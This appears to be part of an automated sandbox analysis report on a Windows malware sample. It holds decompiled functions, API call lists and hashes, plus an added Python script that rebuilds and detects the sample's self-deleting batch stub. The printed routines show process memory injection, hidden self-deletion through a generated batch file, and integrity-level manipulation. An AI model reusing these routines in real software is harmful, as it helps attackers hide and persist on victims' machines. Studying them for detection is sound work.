    															_t101 = MoveFileExW(_t123,  &_v1580, 0xb);
    															__eflags = _t101;
    															if(_t101 == 0) {
    																goto L29;
    															} else {
    																E00419B7B(_t141);
    																__eflags = _t101 | 0xffffffff;
    																_t128 =  &_v1584;
    																_t129 = _t123;
    																E00416749(_t101 | 0xffffffff,  &_v1584, _t123);
    																goto L24;
    															}
    														}
    													}
    												} else {
    													__eflags = _v1588 - 0xffffffff;
    													if(_v1588 > 0xffffffff) {
    														goto L28;
    													} else {
    														goto L20;
    													}
    												}
    											}
    										} else {
    											__eflags = _t134;
    											if(_t134 == 0) {
    												goto L28;
    											} else {
    												goto L17;
    											}
    										}
    									}
    								}
    							}
    							_t85 = WaitForSingleObject( *0x42305c, _t84);
    							__eflags = _t85 - 0x102;
    						} while (_t85 == 0x102);
    					}
    					E00419B7B(_v1620);
    					_t136 = 0;
    				} else {
    					_t136 = 1;
    				}
    				E004163A8(_t131);
    				return _t136;
    			}

    0x00405282
    0x00405291
    0x004052a5
    0x004052aa
    0x004052b0
    0x004052cb
    0x004052d6
    0x004052e1
    0x004052e9
    0x004052f1
    0x004052f5
    0x0040530f
    0x00405317
    0x00405317
    0x00405319
    0x0040533d
    0x0040533d
    0x00405340
    0x00405344
    0x00000000
    0x0040531b
    0x0040531b
    0x0040531c
    0x00405328
    0x0040532c
    0x0040534c
    0x0040534c
    0x0040534c
    0x0040531c
    0x0040535a
    0x0040536d
    0x0040537a
    0x00405381
    0x00405386
    0x0040538b
    0x0040538d
    0x00405393
    0x00405393
    0x00405396
    0x0040539b
    0x0040549b
    0x0040549b
    0x004054a0
    0x004054a2
    0x004054a4
    0x00000000
    0x004054a6
    0x004054b9
    0x004054bd
    0x004054c2
    0x004054c6
    0x0040553e
    0x00000000
    0x004054c8
    0x004054c8
    0x004054d3
    0x004054d8
    0x004054db
    0x004054dd
    0x00405541
    0x00405541
    0x004054df
    0x004054e2
    0x004054e9
    0x004054ee
    0x004054f5
    0x004054f8
    0x00405501
    0x00405501
    0x004054dd
    0x00405549
    0x0040554e
    0x00405551
    0x00405559
    0x0040555b
    0x00000000
    0x0040555d
    0x0040555d
    0x0040555d
    0x00405553
    0x00405553
    0x00405553
    0x00405551
    0x004053a1
    0x004053a8
    0x004053b4
    0x004053c4
    0x004053ca
    0x004053cc
    0x004053cf
    0x004053dd
    0x004053df
    0x004053e2
    0x00000000
    0x004053e8
    0x004053e8
    0x00000000
    0x004053e8
    0x004053d1
    0x004053d1
    0x004053ea
    0x004053ed
    0x004053ef
    0x00405409
    0x0040540b
    0x0040540e
    0x00405508
    0x00405509
    0x00000000
    0x00405414
    0x0040541b
    0x0040541f
    0x00405421
    0x00405427
    0x0040542c
    0x00405436
    0x00405436
    0x00405438
    0x00000000
    0x0040543e
    0x0040543e
    0x0040544b
    0x00405457
    0x00405459
    0x00000000
    0x0040545b
    0x00405467
    0x00405469
    0x0040546b
    0x0040550e
    0x0040550e
    0x00405511
    0x00405471
    0x00405479
    0x0040547f
    0x00405481
    0x00000000
    0x00405487
    0x00405488
    0x0040548d
    0x00405490
    0x00405494
    0x00405496
    0x00000000
    0x00405496
    0x00405481
    0x0040546b
    0x00405440
    0x00405440
    0x00405445
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00405445
    0x0040543e
    0x0040542e
    0x0040542e
    0x00405430
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00405430
    0x0040542c
    0x0040540e
    0x004053cf
    0x0040551d
    0x00405523
    0x00405523
    0x00405393
    0x00405532
    0x00405537
    0x004052b2
    0x004052b4
    0x004052b4
    0x004052b6
    0x004052c3

    APIs
      • Part of subcall function 0040EDBB: CreateMutexW.KERNEL32(00422BD0,00000000,?,?,?,?,?), ref: 0040EDDC
    • GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000318,?,?,00000102), ref: 004053CA
    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00405403
    • CloseHandle.KERNEL32(00000000,00000000), ref: 00405421
    • lstrcmpiW.KERNEL32(?,?), ref: 00405451
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
    • String ID:
    • API String ID: 503543330-0
    • Opcode ID: a551fcf92da6eda0e03976b2a21ea83e966c07776e7b3f6c8d3ff0ee8b822606
    • Instruction ID: a93f248e11021d3eea97378de2ec924c89e2c0d3699c819ac599492a8fca6bad
    • Opcode Fuzzy Hash: a551fcf92da6eda0e03976b2a21ea83e966c07776e7b3f6c8d3ff0ee8b822606
    • Instruction Fuzzy Hash: C371BD31504741ABC720EF24CC81AABB7E9EF81324F140A3FF995E62D1D738D9458B9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0040EDF6(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
    				char _v5;
    				void _v12;
    				intOrPtr _t25;
    				void _t26;
    				signed int _t29;
    				void _t43;
    				void* _t51;
    				void* _t52;
    
    				_t52 = __esi;
    				_t51 = __edi;
    				_t25 =  *0x422bac; // 0x400000
    				_t26 = E0041AD03(_t25, __edi);
    				_v12 = _t26;
    				if(_t26 != 0) {
    					_v5 = 0;
    					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
    						_v5 = 1;
    					}
    					_t29 =  *0x422b98; // 0x1
    					_a8 = _a8 | _t29 & 0x00000014;
    					_push(_t52);
    					if(WriteProcessMemory(_t51, 0x422b98 -  *0x422bac + _v12,  &_a8, 4, 0) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(WriteProcessMemory(_t51, 0x422bac -  *0x422bac + _v12,  &_v12, 4, 0) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(E0040E5D7(0x42305c, _t51, _v12,  *0x42305c) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(E0040E5D7(0x423060, _t51, _v12,  *0x423060) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(_v5 == 0) {
    						_t43 = _v12;
    					} else {
    						VirtualFreeEx(_t51, _v12, 0, 0x8000);
    						goto L1;
    					}
    				} else {
    					L1:
    					_t43 = 0;
    				}
    				return _t43;
    			}

    0x0040edf6
    0x0040edf6
    0x0040edfb
    0x0040ee02
    0x0040ee09
    0x0040ee0e
    0x0040ee23
    0x0040ee30
    0x0040ee32
    0x0040ee32
    0x0040ee36
    0x0040ee3e
    0x0040ee41
    0x0040ee63
    0x0040ee65
    0x0040ee65
    0x0040ee84
    0x0040ee86
    0x0040ee86
    0x0040ee9f
    0x0040eea1
    0x0040eea1
    0x0040eeba
    0x0040eebc
    0x0040eebc
    0x0040eec2
    0x0040eed9
    0x0040eec4
    0x0040eece
    0x00000000
    0x0040eece
    0x0040ee10
    0x0040ee10
    0x0040ee10
    0x0040ee10
    0x0040eede

    APIs
      • Part of subcall function 0041AD03: IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 0041AD1F
    • DuplicateHandle.KERNEL32(000000FF,74B5F560,00000000,74B5F560,00000000,00000000,00000002,00000000,00000000,?,?,?,00415A55,?,00000000,?), ref: 0040EE28
    • WriteProcessMemory.KERNEL32(00000000,74B5F560,?,00000004,00000000,?,?,?,?,00415A55,?,00000000,?,?,00415BE3,?), ref: 0040EE5F
    • WriteProcessMemory.KERNEL32(00000000,74B5F560,74B5F560,00000004,00000000,?,?,?,00415A55,?,00000000,?,?,00415BE3,?,?), ref: 0040EE7F
    • VirtualFreeEx.KERNEL32(00000000,74B5F560,00000000,00008000,00000000,74B5F560,00000000,74B5F560,?,?,00415A55,?,00000000,?,?,00415BE3), ref: 0040EECE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
    • String ID: \0B$`0B
    • API String ID: 2215616122-2135143743
    • Opcode ID: 8e7f3c0b844cbb3ee79bc72f6ee6713d0c131ed688861d5c25a01e13f1c3a75d
    • Instruction ID: 7dd66aab72cd2963f5657b2b1d80a40bfa13afb11ab977881fac23c46b1ac80a
    • Opcode Fuzzy Hash: 8e7f3c0b844cbb3ee79bc72f6ee6713d0c131ed688861d5c25a01e13f1c3a75d
    • Instruction Fuzzy Hash: 5A21D37260414DBEDF119FA5DD80EBF7F78EB09348F404476F600B2191D37A9A568B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00412969(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
    				void* _v8;
    				long _v12;
    				void* _v16;
    				char _v32;
    				void _v360;
    				short _v880;
    				void* __edi;
    				void* __esi;
    				void* _t18;
    				void* _t25;
    				void* _t26;
    				long _t39;
    				void* _t42;
    				void* _t44;
    				long _t47;
    
    				_t48 =  &_v32;
    				_t18 = 0x2b;
    				_v16 = __edx;
    				_t44 = __ecx;
    				E0040FA33(_t18,  &_v32);
    				if(E0041BC2F(_t48,  &_v880, _t44) == 0) {
    					L11:
    					return 1;
    				}
    				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
    				_v8 = _t25;
    				if(_t25 == 0xffffffff) {
    					goto L11;
    				}
    				_t26 = 0x30;
    				_t39 = 0;
    				E0040F9FD(_t26,  &_v360);
    				_t9 =  &_v8; // 0x412951
    				if(WriteFile( *_t9,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
    					L9:
    					FlushFileBuffers(_v8);
    					CloseHandle(_v8);
    					if(_t39 == 0) {
    						E0041B705( &_v880);
    					}
    					goto L11;
    				} else {
    					_t42 = _v16;
    					if(_t42 == 0) {
    						L7:
    						_t39 = 1;
    						goto L9;
    					}
    					_t47 = E00416EE5(_t42);
    					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
    						_t39 = 0;
    						goto L9;
    					} else {
    						goto L7;
    					}
    				}
    			}

    0x00412976
    0x00412979
    0x0041297a
    0x0041297d
    0x0041297f
    0x00412995
    0x00412a4b
    0x00412a4f
    0x00412a4f
    0x004129b4
    0x004129ba
    0x004129c0
    0x00000000
    0x00000000
    0x004129cf
    0x004129d0
    0x004129d2
    0x004129ef
    0x004129f6
    0x00412a27
    0x00412a2a
    0x00412a33
    0x00412a3c
    0x00412a45
    0x00412a45
    0x00000000
    0x004129fd
    0x004129fd
    0x00412a02
    0x00412a21
    0x00412a21
    0x00000000
    0x00412a21
    0x00412a0b
    0x00412a1a
    0x00412a25
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00412a1a

    APIs
      • Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 004129B4
    • WriteFile.KERNEL32(Q)A,?,00000146,?,00000000,00000000), ref: 004129F2
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00412A16
    • FlushFileBuffers.KERNEL32(?), ref: 00412A2A
    • CloseHandle.KERNEL32(?), ref: 00412A33
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
    • String ID: Q)A
    • API String ID: 2459967240-3617747832
    • Opcode ID: ef876b2a069be169e90b6184df78c9ccb26ea1b7e5d1ffcbb19f52362c1ad6cc
    • Instruction ID: d1f190e6ca25707627269e5bd167f62add1a035dd1a15446e38472afb72ad185
    • Opcode Fuzzy Hash: ef876b2a069be169e90b6184df78c9ccb26ea1b7e5d1ffcbb19f52362c1ad6cc
    • Instruction Fuzzy Hash: D621BA32A10218BBCF21DBA1DE45FEF7BBCAF44390F1440A6A500F21A0D7799B85CA64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00417E68(void* __ebx, void* __edi, char _a4) {
    				short _v24;
    				intOrPtr _v28;
    				char _v72;
    				short _v592;
    				char _v852;
    				char _v1392;
    				void* _t35;
    				char _t56;
    
    				if(E0041B726(L"bat",  &_v592) == 0) {
    					L7:
    					return 0;
    				}
    				CharToOemW( &_v592,  &_v852);
    				_push( &_v852);
    				if(E0041716C( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
    					L6:
    					E0041B705( &_v592);
    					goto L7;
    				}
    				_t35 = E0041B55A( &_v592, _a4, _t31);
    				E004163A8(_a4);
    				if(_t35 == 0) {
    					goto L6;
    				}
    				_push(__edi);
    				_push( &_v592);
    				if(E0041709B( &_v592, 0x10e,  &_v1392,  &M00404934) <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
    					goto L6;
    				} else {
    					_t56 = 0x44;
    					E0041645B( &_v72,  &_v72, 0, _t56);
    					_v24 = 0;
    					_v72 = _t56;
    					_v28 = 1;
    					return E00417C6F( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
    				}
    			}

    0x00417e84
    0x00417f76
    0x00000000
    0x00417f76
    0x00417e98
    0x00417ea4
    0x00417ebc
    0x00417f6a
    0x00417f71
    0x00000000
    0x00417f71
    0x00417ece
    0x00417ed8
    0x00417ee0
    0x00000000
    0x00000000
    0x00417ee6
    0x00417eed
    0x00417f09
    0x00000000
    0x00417f2a
    0x00417f2c
    0x00417f34
    0x00417f3c
    0x00417f54
    0x00417f57
    0x00000000
    0x00417f65

    APIs
      • Part of subcall function 0041B726: GetTempPathW.KERNEL32(000000F6,?), ref: 0041B73D
    • CharToOemW.USER32 ref: 00417E98
      • Part of subcall function 0041B55A: CreateFileW.KERNEL32(00417E82,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0041B799,00417E82,00000000,00000000,00417E82,?), ref: 0041B574
      • Part of subcall function 0041B55A: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041B799,00417E82,00000000,00000000,00417E82,?), ref: 0041B597
      • Part of subcall function 0041B55A: CloseHandle.KERNEL32(00000000,?,0041B799,00417E82,00000000,00000000,00417E82,?), ref: 0041B5A4
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00417F1C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
    • String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
    • API String ID: 1639923935-3344086482
    • Opcode ID: 8b61006d3b09432e9c488e848f97d69f859d58a4acfec2040584f181bacd857f
    • Instruction ID: b5292adf52b9b25521904c90738d61d5b1307400b8583d15660041982185abb3
    • Opcode Fuzzy Hash: 8b61006d3b09432e9c488e848f97d69f859d58a4acfec2040584f181bacd857f
    • Instruction Fuzzy Hash: A72185B19052096ADB10DBA4CC85FEF73BCEB44314F104167B608E2191E6789BCA8B68
    Uniqueness

    Uniqueness Score: -1.00%
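
The function above (E00417E68) is the sample's self-removal routine: it obtains a temporary file name with the extension bat, converts that path with CharToOemW, formats `@echo off\r\n%s\r\ndel /F "%s"\r\n` with a caller-supplied command as the first `%s` and the batch file's own path as the second, writes the result, reads ComSpec, builds `/c "<bat>"`, and starts the shell through a STARTUPINFO whose cb is 0x44, dwFlags is 1 (STARTF_USESHOWWINDOW) and wShowWindow is 0 (SW_HIDE), so the console never appears. The example below is added for this report and is not code from the sample or from Joe Sandbox; it rebuilds the stub from the recovered template and then triages batch files found in a Temp directory (the listing and the paths in it are constructed) so that an analyst can tell a stub that deletes itself from an ordinary script that happens to call `del`.

```python
"""Recover and triage the self-delete batch stub built by E00417E68.  Added example
for this report, not code from the sample or from Joe Sandbox.  The template is the
format string visible in the decompilation; the Temp listing below is constructed."""
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

# First %s: the command the stub runs; second %s: the stub's own path (the sample
# passes it through CharToOemW so cmd.exe reads it back correctly).
SELF_DELETE_TEMPLATE = '@echo off\r\n%s\r\ndel /F "%s"\r\n'

_DEL_RE = re.compile(r'^del\s+/F\s+"(?P<target>[^"]+)"\s*$', re.IGNORECASE)


class SelfDeleteStub(NamedTuple):
    command: str        # what runs before the deletion (typically removes the dropper)
    deleted_path: str   # argument of the trailing `del /F`
    deletes_itself: bool


def build_self_delete_batch(command: str, bat_path: str) -> str:
    """Reproduce the stub exactly as the sample formats it (used here for test input)."""
    return SELF_DELETE_TEMPLATE % (command, bat_path)


def triage_batch(text: str, bat_path: Optional[str] = None) -> Optional[SelfDeleteStub]:
    """Return a SelfDeleteStub when `text` has the @echo off / <cmd> / del /F shape."""
    lines = [ln.strip() for ln in text.replace("\r\n", "\n").split("\n") if ln.strip()]
    if len(lines) < 3 or lines[0].lower() != "@echo off":
        return None
    m = _DEL_RE.match(lines[-1])
    if not m:
        return None
    target = m.group("target")
    # Windows paths are case-insensitive, and the OEM conversion leaves ASCII unchanged.
    deletes_itself = bat_path is not None and target.casefold() == bat_path.casefold()
    return SelfDeleteStub("\n".join(lines[1:-1]), target, deletes_itself)


def scan_temp_listing(files: Dict[str, str]) -> List[Tuple[str, SelfDeleteStub]]:
    """files maps path -> content as read from %TEMP%; only .bat entries are examined."""
    hits = []
    for path, content in files.items():
        if not path.lower().endswith(".bat"):
            continue
        stub = triage_batch(content, path)
        if stub is not None:
            hits.append((path, stub))
    return hits


# Constructed %TEMP% listing: one stub in the sample's shape, one unrelated script,
# one deletion stub that removes a different file, and a non-.bat decoy.
TEMP_DIR = r"C:\Users\victim\AppData\Local\Temp"
STUB_PATH = TEMP_DIR + r"\tmp1a2b.bat"
SAMPLE_TEMP_LISTING = {
    STUB_PATH: build_self_delete_batch(
        r'del /F "C:\Users\victim\Downloads\GqSL8M2a72.exe"', STUB_PATH),
    TEMP_DIR + r"\install.bat": "@echo off\r\nxcopy /y app\\*.* %APPDATA%\\app\\\r\n",
    TEMP_DIR + r"\cleanup.bat": '@echo off\r\necho cleaning\r\ndel /F "C:\\tmp\\old.log"\r\n',
    TEMP_DIR + r"\notes.txt": '@echo off\r\nnotes\r\ndel /F "x"\r\n',
}

if __name__ == "__main__":
    for path, stub in scan_temp_listing(SAMPLE_TEMP_LISTING):
        kind = "self-delete stub" if stub.deletes_itself else "deletion script"
        print(f"{path}: {kind}, removes {stub.deleted_path}, runs {stub.command!r}")
```

Because the stub removes itself as its last act, a copy is rarely still on disk by the time a host is examined; the triage applies to copies recovered from the USN journal, file carving or a sandbox's dropped-file list, and the command it ran is usually the only remaining pointer to where the original executable lived.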

    C-Code - Quality: 95%
    			E00417AFC(void* __ecx) {
    				long _v8;
    				void* _v12;
    				char* _t21;
    				signed char _t22;
    				DWORD* _t25;
    				void* _t32;
    
    				_t28 = 0;
    				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
    					L14:
    					return _t28;
    				}
    				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
    					L13:
    					CloseHandle(_v12);
    					goto L14;
    				} else {
    					_t32 = E00416378(_v8);
    					if(_t32 == 0) {
    						L12:
    						goto L13;
    					}
    					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
    						_t21 = GetSidSubAuthorityCount( *_t32);
    						if(_t21 != 0) {
    							_t22 =  *_t21;
    							if(_t22 > 0) {
    								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
    								if(_t25 != 0) {
    									if( *_t25 >= 0x2000) {
    										asm("sbb bl, bl");
    										_t28 = 3;
    									} else {
    										_t28 = 1;
    									}
    								}
    							}
    						}
    					}
    					E004163A8(_t32);
    					goto L12;
    				}
    			}

    0x00417b0a
    0x00417b14
    0x00417baa
    0x00417bae
    0x00417bae
    0x00417b30
    0x00417ba0
    0x00417ba3
    0x00000000
    0x00417b3d
    0x00417b46
    0x00417b4a
    0x00417b9f
    0x00000000
    0x00417b9f
    0x00417b5d
    0x00417b61
    0x00417b69
    0x00417b6b
    0x00417b6f
    0x00417b78
    0x00417b80
    0x00417b89
    0x00417b94
    0x00417b96
    0x00417b8b
    0x00417b8b
    0x00417b8b
    0x00417b89
    0x00417b80
    0x00417b6f
    0x00417b69
    0x00417b9a
    0x00000000
    0x00417b9a

    APIs
    • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417B0C
    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,74B04EE0,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417B2C
    • GetLastError.KERNEL32(?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417B32
    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417B59
    • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417B61
    • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417B78
    • CloseHandle.KERNEL32(?,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417BA3
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
    • String ID:
    • API String ID: 3714493844-0
    • Opcode ID: e19b61e6665ae69856c8db5720c7b52f8b71fe9158816b22c65cdc973e07eda0
    • Instruction ID: e7584ebe7203c9437e8928a546317e1d6c502364da8885f54ba81c069cc89ad8
    • Opcode Fuzzy Hash: e19b61e6665ae69856c8db5720c7b52f8b71fe9158816b22c65cdc973e07eda0
    • Instruction Fuzzy Hash: F611D0B160810ABFEB105B91DD84EFE3B7DDB45354F100467F510E6162D739AEC5AB28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A8C2(short* _a4) {
    				char _v5;
    				int _v12;
    				void* _v16;
    				void* _v20;
    				int _v24;
    				long _t18;
    
    				_v5 = 0;
    				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
    				_t33 = _t18;
    				if(_t18 == 0) {
    					_v12 = 0;
    					do {
    						E0041A727(6, 4, _t33, 2, _a4);
    						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
    							goto L4;
    						} else {
    							RegCloseKey(_v20);
    							if(_v24 == 1) {
    								_v5 = 1;
    							} else {
    								goto L4;
    							}
    						}
    						L7:
    						RegCloseKey(_v16);
    						goto L8;
    						L4:
    						_v12 = _v12 + 1;
    					} while (_v12 < 0x64);
    					goto L7;
    				}
    				L8:
    				return _v5;
    			}

    0x0041a8e7
    0x0041a8ea
    0x0041a8ec
    0x0041a8ee
    0x0041a8f7
    0x0041a8fa
    0x0041a903
    0x0041a920
    0x00000000
    0x0041a922
    0x0041a925
    0x0041a92b
    0x0041a938
    0x00000000
    0x00000000
    0x00000000
    0x0041a92b
    0x0041a93c
    0x0041a93f
    0x00000000
    0x0041a92d
    0x0041a92d
    0x0041a930
    0x00000000
    0x0041a936
    0x0041a942
    0x0041a948

    APIs
    • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 0041A8EA
      • Part of subcall function 0041A727: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041A848
    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0041A91C
    • RegCloseKey.ADVAPI32(?), ref: 0041A925
    • RegCloseKey.ADVAPI32(?), ref: 0041A93F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CloseCreate$CharUpper
    • String ID: SOFTWARE\Microsoft$d
    • API String ID: 1794619670-1227932965
    • Opcode ID: e20f60c1211e805c65eb7a710195401493c590f5543fdb91481e3d3edbb39ff6
    • Instruction ID: 3ddabdde60e63dc9cc8459f4f124f8720fc6b1ad5dbd9f6b4d0aefc74b31ff05
    • Opcode Fuzzy Hash: e20f60c1211e805c65eb7a710195401493c590f5543fdb91481e3d3edbb39ff6
    • Instruction Fuzzy Hash: D2115BB590120DBEEB029B948D81EFFBB7CEF04388F104067F901B6260D2759E958B75
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E00419A29(intOrPtr _a4) {
    				struct _ACL* _v8;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				int _v16;
    				int _v20;
    				void** _t11;
    				int _t16;
    				struct _ACL* _t18;
    
    				_t18 = 0;
    				E00417A74(L"SeSecurityPrivilege");
    				_t11 =  &_v12;
    				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
    				if(_t11 != 0) {
    					_v8 = 0;
    					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
    					if(_t16 != 0) {
    						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
    						if(_t16 == 0) {
    							_t18 = 1;
    						}
    					}
    					LocalFree(_v12);
    				}
    				return _t18;
    			}

    0x00419a35
    0x00419a37
    0x00419a3d
    0x00419a48
    0x00419a50
    0x00419a61
    0x00419a64
    0x00419a6c
    0x00419a7b
    0x00419a83
    0x00419a85
    0x00419a85
    0x00419a83
    0x00419a8a
    0x00419a8a
    0x00419a94

    APIs
      • Part of subcall function 00417A74: GetCurrentThread.KERNEL32 ref: 00417A84
      • Part of subcall function 00417A74: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00408F58,SeTcbPrivilege), ref: 00417A8B
      • Part of subcall function 00417A74: OpenProcessToken.ADVAPI32(000000FF,00000020,00408F58,?,?,?,?,00408F58,SeTcbPrivilege), ref: 00417A9D
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 00419A48
    • GetSecurityDescriptorSacl.ADVAPI32(?,00000000,?,00000000), ref: 00419A64
    • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 00419A7B
    • LocalFree.KERNEL32(?), ref: 00419A8A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    • API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
    • String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
    • API String ID: 3555451682-1937014404
    • Opcode ID: 2de9f30c2b527670f1b16a64b0b50ea5ddee59a57887ca4d8b0b84e7ed5b7d6e
    • Instruction ID: 43c2eb3a89c2a4d4ca9d023c22bd5654cb62dff96fa4c3df7968098ece0f5996
    • Opcode Fuzzy Hash: 2de9f30c2b527670f1b16a64b0b50ea5ddee59a57887ca4d8b0b84e7ed5b7d6e
